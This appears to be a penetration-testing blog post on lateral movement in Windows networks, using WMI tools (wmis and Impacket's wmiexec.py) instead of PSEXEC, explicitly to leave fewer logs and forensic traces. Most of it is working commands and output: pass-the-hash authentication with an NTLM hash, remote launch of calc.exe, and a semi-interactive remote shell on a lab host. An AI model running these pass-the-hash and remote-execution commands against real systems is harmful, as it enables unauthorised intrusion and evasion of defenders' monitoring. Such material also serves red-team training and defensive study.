Executing code via SMB / DCOM without PSEXEC

Rob Fuller included in wmi wmis impacket

2014-04-19 637 words 3 minutes

Contents

PSEXEC has been a staple for Windows post exploitation pivoting and system administration for a long while. The basic premise of how all “psexec” tools work is:

(Optional) Upload a service executable (PSEXECSVC.EXE in the case of SysInternal’s tool) to the ADMIN$ share
Connect to the service manager on the remote host, and create a service based on either a local (to the remote system) executable or the uploaded one.
Run the service
Stop and delete the service and uploaded file pulling down the resulting output if any from the execution.

Now, as you can guess, the uploading of a file, creating, starting, stopping, and deletion of services create quite the logs and forensic evidence.

As you might imagine, thats not the best thing for us on the offensive side of infosec. Luckily big brother Microsoft provides another option, WMI (Windows Management Interface). I demonstrated the use of this in the past: HERE and HERE

The downside to using the WMIC directly is that you need a valid token or a valid password for it to work. Passing the hash didn’t used to be an available option.

That has changed with the “wmis” package on Kali Linux that incorporates the “Pass-the-Hash for 15 years toolkit”

(There is a slight problem where you have to play with it a bit to get it working on 64 bit Kali)

The other solution is supplied as an example in the Impacket library “wmiexec.py”. In my experience there are a few features that make it the better option.

Installing it on a random VPS is dead simple and doesn’t need the Kali repos to get right, nor Debian/Ubuntu.
It defaults to an “semi-interactive shell” which writes and reads output from the ADMIN$ shell by default. Something I would normally have to do manually with a bunch of tools
As with the WMIS package, it allows you to just create a process without the ADMIN$ write/read.

Enough crazy talk here is an example usage of each:

WMIS

Usage:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


root@wpad:~# wmis
Usage: [-?NPV] [-?|--help] [--usage] [-d|--debuglevel=DEBUGLEVEL] [--debug-stderr] [-s|--configfile=CONFIGFILE]
        [--option=name=value] [-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full]
        [-R|--name-resolve=NAME-RESOLVE-ORDER] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME]
        [-W|--workgroup=WORKGROUP] [--realm=REALM] [-i|--scope=SCOPE] [-m|--maxprotocol=MAXPROTOCOL]
        [-U|--user=[DOMAIN\]USERNAME[%PASSWORD]] [-N|--no-pass] [--password=STRING] [-A|--authentication-file=FILE]
        [-S|--signing=on|off|required] [-P|--machine-pass] [--simple-bind-dn=STRING] [-k|--kerberos=STRING]
        [--use-security-mechanisms=STRING] [-V|--version]
        //host

Example: wmis -U [domain/]adminuser%password //host cmd.exe /c dir c:\ > c:\windows\temp\output.txt 

Example:

1
2
3
4
5


root@wpad:~# wmis -U administrator%aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 //172.16.102.141 calc.exe
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
[wmi/wmis.c:172:main()] 1: calc.exe
NTSTATUS: NT_STATUS_OK - Success

wmiexec.py

Using a password, but with hashes you just tell it -hashes :

Usage:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21


root@wpad:~/impacket/examples# ./wmiexec.py 
Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies

usage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-hashes LMHASH:NTHASH]
                  target [command [command ...]]

positional arguments:
  target                [domain/][username[:password]@]<address>
  command               command to execute at the target. If empty it will
                        launch a semi-interactive shell

optional arguments:
  -h, --help            show this help message and exit
  -share SHARE          share where the output will be grabbed from (default
                        C$)
  -nooutput             whether or not to print the output (no SMB connection
                        created)

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

Example:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


root@wpad:~/impacket/examples# ./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 administrator@172.16.102.141
Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies

SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 5CCA-B528

 Directory of C:\

07/13/2009  11:20 PM    <DIR>          PerfLogs
10/07/2013  03:26 PM    <DIR>          Program Files
07/14/2009  01:08 AM    <DIR>          Program Files (x86)
04/25/2014  02:21 AM    <DIR>          Users
05/11/2014  03:39 PM    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  52,884,389,888 bytes free

C:\>